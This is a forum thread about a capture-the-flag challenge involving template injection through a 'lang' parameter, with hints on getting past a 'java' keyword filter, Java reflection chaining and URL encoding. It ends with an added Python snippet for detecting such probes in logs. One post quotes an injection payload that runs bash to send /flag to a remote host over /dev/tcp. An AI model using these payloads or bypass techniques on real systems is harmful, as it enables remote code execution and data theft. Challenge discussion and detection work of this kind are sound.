The creator of the challenge forgot to delete the original flag
How? Whatever payload I am using, I am only getting 400 bad request.
Url encode all characters
Your payload contains the blacklisted word java. You need to bypass the filter. Check the resources I sent in this thread. There are bypass examples in one of them.
@Hex can “java” be bypassed by using the LIBS like “Java.lang.Runtime”
in this article
WAF Bypassed
the bash command have been used
Thanks a lot 4 this Java REV SHELL
I don’t think you can bypass it with Java because it compares the input after converting to lowercase. Instead, you need string manipulation.
I am trying __*%24%7bRuntime.getRuntime().exec(%22bash%20-c%20cat%24%7bIFS%7d%2fflag*%3e%26%2fdev%2ftcp%2f172.20.10.2%2f1234%3c%261)%22%7d__%3a%3a.x from the https://github.com/welk1n/ReverseShell-Java and getting 500 whitelabel error…
Because you can’t reach directly to the Runtime class.
This site demonstrates a creative way of calling java.lang.Runtime as a string, allowing you to perform string manipulation
Check how java is being detected, bypass is simpler than you might think
This simple payload __*${7*7}__::.x url enc should result in 49 but does not work and only returns 500.
GET /?lang=%5f%5f%2a%24%7b%37%2a%37%7d%5f%5f%3a%3a%2e%78 HTTP/1.1
Are there any links to this topic? java.io.File has the listFiles method to retrieve file names. java.nio.Files has the readAllLines method. Because without a public ip, a reverse shell is not possible.
Try __${7*7}__::.x encoded as %5F%5F%24%7B7%2A7%7D%5F%5F%3A%3A%2Ex. You should see a 49 returned.
Thanks … that was the mistake.
Have you found a way without reverse shell (no public ip)?
I tried those but couldn’t create a proper payload to read the flag without a reverse shell.
Java is very picky about what objects it receives, if you get that right you’ll make methods work.
For example: readAllLines doesn’t like String, it wants Paths object (java.nio.file.Paths)
Also pay attention to method types, static methods don’t need object instance while non-static do.
I still don’t understand if it’s possible to create instance of objects, don’t know if I can use non-static methods
The idea is similar to Python, but with more Java f#*kery. My Java knowledge is not in depth, just basics. Sorry if the hints are terrible. Simple objects is definitely possible, not sure about chaining different objects.
To create object instance like: ''.getClass().forName(someClassName).getConstructor(someClassObject).newInstance(constructorArg).method(methodArg)
For static like: ''.getClass().forName(someClassName).method(arg)
Never mind, I got it, thank you for the hints
I try to bypass the filter “java” but nothing happens. Can you help me?
Please show what you have done so we can help you here
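For the defending side of this thread, an added example (not part of any post and not the challenge's code): the probes quoted above arrive fully percent-encoded, so a log rule has to decode the lang value before looking for an expression wrapped in double underscores. The request lines are constructed from the values quoted in the thread, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# An expression opener (${ *{ #{ @{ ~{) enclosed in double underscores,
# the shape of both probes quoted in the thread.
PREPROCESSED_EXPR = re.compile(r"__.*?[$*#@~]\{.*?\}.*?__", re.S)
REQUEST_LINE = re.compile(r"^[A-Z]+ (?P<target>\S+) HTTP/\d\.\d$")


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(request_line):
    """Return the query parameters whose decoded value matches the pattern."""
    match = REQUEST_LINE.match(request_line.strip())
    if not match:
        return []
    query = urlsplit(match.group("target")).query
    return [
        name
        for name, value in parse_qsl(query, keep_blank_values=True)
        if PREPROCESSED_EXPR.search(fully_decode(value))
    ]


# Constructed access-log request lines; the first two reuse the encoded
# values quoted in the thread, the last two are benign.
SAMPLE_LINES = [
    "GET /?lang=%5f%5f%2a%24%7b%37%2a%37%7d%5f%5f%3a%3a%2e%78 HTTP/1.1",
    "GET /?lang=%5F%5F%24%7B7%2A7%7D%5F%5F%3A%3A%2Ex HTTP/1.1",
    "GET /?lang=en HTTP/1.1",
    "GET /?lang=en__US&page=2 HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        raw_hit = "${" in line  # naive match on the undecoded line
        print(f"raw={raw_hit!s:5} decoded={suspicious_params(line)} {line}")
```

A substring match on the raw request line misses both encoded probes, while the decoded check flags lang in each and leaves the benign requests alone.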